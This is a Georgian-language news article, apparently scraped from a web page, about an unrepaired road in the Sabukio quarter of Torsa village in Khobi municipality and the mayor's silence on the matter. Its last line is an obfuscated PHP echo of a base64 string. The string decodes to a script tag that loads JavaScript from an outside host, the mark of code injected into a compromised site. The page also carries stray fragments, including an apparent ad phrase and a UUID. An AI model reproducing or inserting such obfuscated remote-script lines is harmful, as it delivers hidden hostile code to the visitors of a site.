gorgia
jaluzi

ხობის მუნიციპალიტეტში, სოფელ თორსას საბუკიოს უბანში გზა კვლავ მოუწესრიგებელია და მოსახლეობას ამ დრომდე არ აქვს ინფორმაცია თუ როდის აღმოიფხვრება პრობლემა. 

საბუკიოს უბნის მცხოვრებლები უკვე წლებია ელოდებიან გზის მოწესრიგებას. ადგილობრივების თქმით, უგზოობის პრობლემა განსაკუთრებით მწვავდება წვიმიან ამინდებში, როცა ორმოებით სავსე გზაზე გადაადგილება თითქმის შეუძლებელია.

„სკოლაში ბავშვების წაყვანაც ჭირს, სასწრაფოც ვერ მოდის დროულად. წლებია ვითხოვთ დახმარებას, მაგრამ მხოლოდ დაპირებებს ვისმენთ,“ - ამბობს უბნის ერთ-ერთი მცხოვრები საინფორმაციო სააგენტო "ბიზნესთაიმთან". 

a3cc6b69 5b8b 4220 9b94 302b8acd66e6

მოსახლეობა ადგილობრივ ხელისუფლებას აქტიური ქმედებებისკენ მოუწოდებს და აღნიშნავს, რომ გზის საფარის გაუმჯობესება მათთვის უმნიშვნელოვანესია.

საინფორმაციო სააგენტო "ბიზნესთაიმი" აღნიშნულ საკითხზე დეტალების დასაზუსტებლად და მერიის მხრიდან პოზიციის დასაფიქსირებლად, უკვე რამდენიმე დღეა, აქტიურად ცდილობს ხობის მერთან დავით ბუკიასთან დაკავშირებას, თუმცა ამ დრომდე კომუნიკაცია ვერ მოხერხდა. ჩვენს ზარებს და შეტყობინებებს ქალაქის მერი არ პასუხობს. 

 

ავტორი
მირანდა შურღაია
481
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");